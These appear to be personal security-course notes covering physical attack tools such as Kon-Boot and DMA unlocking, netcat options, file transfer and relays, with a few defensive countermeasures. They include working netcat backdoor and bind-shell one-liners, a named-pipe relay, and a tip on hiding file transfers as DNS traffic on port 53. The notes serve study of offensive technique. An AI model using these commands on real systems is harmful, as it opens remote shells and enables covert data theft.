#------------#
#   xploitz  #
#------------#

>PHYS.ATTKS
>>NETCAT
>>>RELAYS
>>>>SNIFFING


#-----PhysicalAttacks-----#


Konboot: usbBoot attack > any pwd accepted
>>>piotrbania[.]com/all/kon-boot

Inception: unlock powered/locked pc via DMA firewire/thunderbolt juice
>>>github/carmaa/inception

LAN turtle: usb ether adapter creates DNS noise + Responder gets hashes
Lanturtle[.]com

RUBBER DUCKY -- Human interface device (HID) for kboard cmds via DUCKY script

Use Full disk encryption - blocks Inception-style attacks
Restrict W+X USB ports. Only R access (not full RWX)
Pwd protect BIOS + disable USB boot
Disable LLMNR (local lan Manager)

#-----NETCAT-----#

R+W data ax net
→ can evade AV
-data transfer (move files)
-port+vuln scan
-juice open ports
-bd
-relay
<><>

-l: This option tells the Netcat to be in listen mode
-u: This shifts Netcat from TCP(default) to UDP mode
-p: For the listener, this is the listened port. For the client, this is source port.
-e: This is a very useful option. This tells what operation to perform after a successful connection.
-L: This makes a persistent listener. Work for Windows only
-wN: This option defines the timeout value. For example, w indicates to wait for 5 seconds before timeout.
-v: This is the verbose mode.




Nmap created a clone called Ncat
--->SSL encryption (both client/listener)
-----multiple clients:listener



[[[Client Mode]]]
NetCat allows only one client:listener
--default in client mode

***what is fragrouter***

[[[Listen Mode]]]
-waits for connections via port ( nc -l )
-packets/traffic comes in via the screen (stdout=screen by default)
-

***PRO TIP: stealthy file transfer via UDP port 53 -- looks like regular DNS traffic***
++PRO TIP: jus run /bin/sh or cmd.exe == already logged in as user who ran NC -l ++


#----MOVE FILES/DATA AX NET-----#
--the file tht gets eating by the mouth is the one being moved
L>C:
nc -l -p 1111 <file.exe
nc 1.2.3.4 1111 >file.exe

C>L:
nc 1.2.3.4 1111 <file.exe
nc -l -p 1111 >file.exe

#------RELAYS------#

1way juice street:

Everything coming here | Now goes here

Nc -l -p 1234 | nc dumbserver -p 4321

***TIP: Netway only performs one cmd after -e, so put everything in .bat file to exe more***
----put heavy cmds in batch file
-----run one nc cmd tht executes the batch file which does more ++

Create Relay via Win:
Create a .bat file containing a cmd to start nc client (nc 10.2.3.90 53)
Create relay (nc -l -p 1234 -e test.bat)

Create Relay via Unix:
Mknod backpipe p (creates FIFO filetype to carry data b/forth)
Nc -l -p 1234 0<backpipe | nc next_hop 4321 1>backpipe

Tip: Mknod backpipe p (old unix sys)
------Mkfifo backpipe (new unix sys)


hxxps://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/062115_2318_NetcatUses1.png


Netcat bd w/o -e 

/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe


[PICERL]: know ways running on ur sys + close unused ports + patch + DinDepth

Useful for *Gcat + Meterpreter*

*lab*

B3.Pg23


#----SNIFFING----#
